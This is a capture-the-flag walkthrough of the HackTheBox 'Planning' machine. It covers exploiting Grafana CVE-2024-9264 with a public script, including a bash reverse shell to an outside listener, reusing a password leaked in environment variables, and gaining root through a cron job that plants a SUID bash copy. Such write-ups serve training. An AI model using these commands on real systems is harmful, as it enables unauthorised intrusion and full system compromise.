HackTheBox - Planning
Planning is an easy difficulty Linux machine that features web enumeration, subdomain fuzzing, and exploitation of a vulnerable Grafana instance to CVE-2024-9264. After gaining initial access to a Docker container, an exposed password enables lateral movement to the host system due to password reuse. Finally, a custom cron management application with root privileges can be leveraged to achieve full system compromise.
Credentials provided for the box: admin / 0D5oT70Fq13EvB5r
Enumeration
nmap
We start an Nmap scan using the following command: sudo nmap -sC -sV -T4 {target_IP}.
-sC: run all the default scripts.
-sV: Find the version of services running on the target.
-T4: Aggressive scan to provide faster results.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Nmap scan report for 10.129.23.1
Host is up (0.52s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_ 256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.14 seconds
We have ssh on port 22 and nginx http serve on port 80 redirecting to the domain planning.htb, let’s add that to /etc/hosts file.
Web
Let’s check the website on port 80.
Nothing looks interesting in the website. I’ll run a subdomain scan using ffuf.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
ffufnames planning.htb -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://planning.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/namelist.txt
:: Header : Host: FUZZ.planning.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
grafana [Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 119ms]
Found grafana, I’ll add that to my hosts file and navigate to it.
We got the login page of grafana, here we can use the credentials provided with the box to login.
Foothold
The version of grafana is 11.0.0, searching that on google I found it vulnerable to SQL Injection that leads to file read and/or command execution CVE-2024-9264.
I’ll use this exploit to get command execution.
1
2
3
4
5
6
7
8
[★]$ python CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r http://grafana.planning.htb/ -c 'id'
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: id
[+] Successfully ran duckdb query:
[+] SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('id >/tmp/grafana_cmd_output 2>&1 |'):
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'):
uid=0(root) gid=0(root) groups=0(root)
For a reverse shell, I’ll use the following command.
1
python CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r http://grafana.planning.htb/ -c 'bash -c "bash -i >& /dev/tcp/10.10.16.33/9001 0>&1"'
Privilege Escalation
Checking the environment variable we find the password of user enzo.
1
2
3
4
5
6
7
root@7ce659d667d7:~/conf# env
AWS_AUTH_SESSION_DURATION=15m
HOSTNAME=7ce659d667d7
[SNIP]
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo
[SNIP]
We can use the password to ssh as user enzo.
1
2
3
4
5
6
7
[★]$ ssh enzo@planning.htb
enzo@planning.htb's password:
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-59-generic x86_64)
[SNIP]
Last login: Tue Sep 30 11:06:24 2025 from 10.10.16.50
enzo@planning:~$ id
uid=1000(enzo) gid=1000(enzo) groups=1000(enzo)
Checking open ports using nestat we find port 8000 listening locally.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
enzo@planning:~$ netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:37729 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.54:53 0.0.0.0:* -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
Let’s forward the port using ssh.
1
ssh enzo@planning.htb -L 8000:127.0.0.1:8000
Now let’s navigate to 127.0.0.1:8000
We got a prompt to authenticate, I tried the credentials we found so far but nothing worked.
Digging into the system I found a file at /opt/crontabs/crontab.db with credentials inside it.
1
2
{"name":"Grafana backup","command":"/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz","schedule":"@daily","stopped":false,"timestamp":"Fri Feb 28 2025 20:36:23 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740774983276,"saved":false,"_id":"GTI22PpoJNtRKg0W"}
{"name":"Cleanup","command":"/root/scripts/cleanup.sh","schedule":"* * * * *","stopped":false,"timestamp":"Sat Mar 01 2025 17:15:09 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740849309992,"saved":false,"_id":"gNIRXh1WIc9K7BYX"}
I managed to login with root:P4ssw0rdS0pRi0T3c
In this site we can create cronjob.
I’ll create a cronjob that makes a copy of bash and give it SUID permissions.
1
cp /bin/bash /tmp/bash && chmod +s /tmp/bash
I’ll save the cronjob and click run now to execute it and then check the /tmp directory.
The binary was created successfully, we run /tmp/bash -p to get a root shell.
References
https://nvd.nist.gov/vuln/detail/CVE-2024-9264
https://github.com/nollium/CVE-2024-9264
Thank you for taking the time to read my write-up, I hope you have learned something from this. If you have any questions or comments, please feel free to reach out to me. See you in the next hack :).








